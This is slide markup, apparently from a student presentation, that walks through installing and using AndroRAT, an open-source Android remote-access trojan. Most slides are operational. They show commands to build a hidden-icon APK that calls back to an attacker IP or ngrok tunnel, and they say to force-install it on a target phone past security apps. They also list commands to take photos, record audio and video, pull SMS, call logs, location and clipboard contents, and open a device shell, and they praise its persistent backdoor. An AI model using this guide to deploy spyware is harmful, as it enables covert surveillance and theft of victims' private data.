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ae81e23c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ae81e23c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085c9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b085c9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ae81e23c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ae81e23c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ae81e23c3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ae81e23c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e81e23c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ae81e23c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ae81e23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ae81e23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ae81e23c3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ae81e23c3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e81e23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e81e23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ae81e23c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ae81e23c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ae81e23c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ae81e23c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e81e23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ae81e23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ae81e23c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ae81e23c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e81e23c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e81e23c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35950"/>
            <a:ext cx="8123100" cy="17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AndroRat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/>
              <a:t>An open source mobile malware</a:t>
            </a:r>
            <a:endParaRPr sz="1355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38773"/>
            <a:ext cx="81231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i="1" lang="en"/>
              <a:t>905054 - Mahfuzzaman Sizan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1905056 - Nur Uddin Ibne Huda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Connection in our computer</a:t>
            </a:r>
            <a:endParaRPr b="1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84250" y="142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Install the APK: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Transferred the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Generated APK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to the target phone and tried to install it. Sometimes some security apps may prevent this app from being installed in that case we have to force install it.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Opening Interpreter from the attacker PC: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</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>python3 androRAT.py --shell [flags]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</a:t>
            </a:r>
            <a:endParaRPr b="1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Commands</a:t>
            </a:r>
            <a:endParaRPr b="1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deviceInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1450"/>
              <a:t>                              returns basic info of the device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c</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1450"/>
              <a:t>amList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1450"/>
              <a:t>                                   returns cameraID  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takepic [cameraID]   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1450"/>
              <a:t>             takes picture from camera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startVideo [cameraID] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1450"/>
              <a:t>          starts recording the video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stopVideo  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1450"/>
              <a:t>                             stop recording the video and return the video file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startAudio  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1450"/>
              <a:t>                            starts recording the audio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stopAudio   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1450"/>
              <a:t>                            stop recording the audio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shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1450"/>
              <a:t>                                       starts a sh shell of the device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Commands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66975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getSMS [inbox | sent]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1450"/>
              <a:t>                    returns inbox sms or sent sms in a file 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getCallLogs  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1450"/>
              <a:t>                                  returns call logs in a file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vibrate [number_of_times]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1450"/>
              <a:t>          vibrate the device number of time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getLocation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1450"/>
              <a:t>                                    return the current location of the device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getIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1450"/>
              <a:t>                                               returns the ip of the device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getSimDetails </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1450"/>
              <a:t>                               returns the details of all sim of the device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clear </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1450"/>
              <a:t>                                               clears the screen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getClipData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1450"/>
              <a:t>                                   return the current saved text from the clipboard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getMACAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1450"/>
              <a:t>                           returns the mac address of the device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/>
              <a:t>exit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1450"/>
              <a:t>                                                exit the interpreter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561350" y="1923750"/>
            <a:ext cx="60213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20"/>
              <a:t>Thank you </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="6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AndroRAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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72675"/>
            <a:ext cx="85206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AndroRAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t> is a tool designed to give control of the Android system remotely and retrieve information from it.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Androrat is a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500"/>
              <a:t>client/server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t> application developed in J</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500"/>
              <a:t>ava Android for the client side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500"/>
              <a:t>Python for the server side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1500"/>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr i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AndroRAT will work on devices from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500"/>
              <a:t>Android 4.1 (Jelly Bean)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500"/>
              <a:t>Android 9.0 (Oreo)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t> (API 16 to API 28).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AndroRat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10525"/>
            <a:ext cx="85206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App starts automatically on boot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Lightweight apk which runs 24/7 in background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Installed app gets hidden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of AndroRAT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61300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Full persistent backdoor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Invisible icon on install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record audio, video, take picture from both camera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browse call logs and SMS logs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fetch current location, sim card deta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>ils, IP and MAC address of the device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Installation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62475" y="1596000"/>
            <a:ext cx="8520600" cy="21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clone https://github.com/karma9874/AndroRAT.git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AndroRAT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pip install -r requirements.txt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Available Modes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661300"/>
            <a:ext cx="85206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–build</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> for building the Android APK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–ngrok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> for using ngrok tunnel (over the internet)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–shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> getting an interactive shell of the device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Mode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i="1" lang="en"/>
              <a:t>To build the apk using ngrok which will also set the listener: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python3 androRAT.py --build --ngrok [flags]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Flags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-p, –port Attacker port number (optional by default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>it’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> set to 8000)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-o, –output Name for the apk file (optional by default it’s set to “karma.apk”)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-icon, –icon Visible icon after installing apk (by default it’s set to hidden)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b="1" lang="en"/>
              <a:t>python3 androRAT.py --build --ngrok -o attacker.apk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Mode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8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2.   To build the apk using desired ip and port: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python3 androRAT.py --build [flags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Flags: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-i, –ip Attacker IP address (required)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-p, –port Attacker port number (required)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-o, –output Name for the apk file (optional)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-icon, –icon Visible icon after installing apk (by default set to hidden)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b="1" lang="en"/>
              <a:t>python3 androRAT.py --build -i 192.168.0.110 -p 8000 -o attacker.apk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Shell Mode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29150"/>
            <a:ext cx="85206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To get the shell interpreter in the attacker device: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python3 androRAT.py --shell [flags]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Flags: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-i, –ip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> IP address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-p, –port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> port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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>python3 androRAT.py -- shell -i </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>192.168.0.110</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> -p 8000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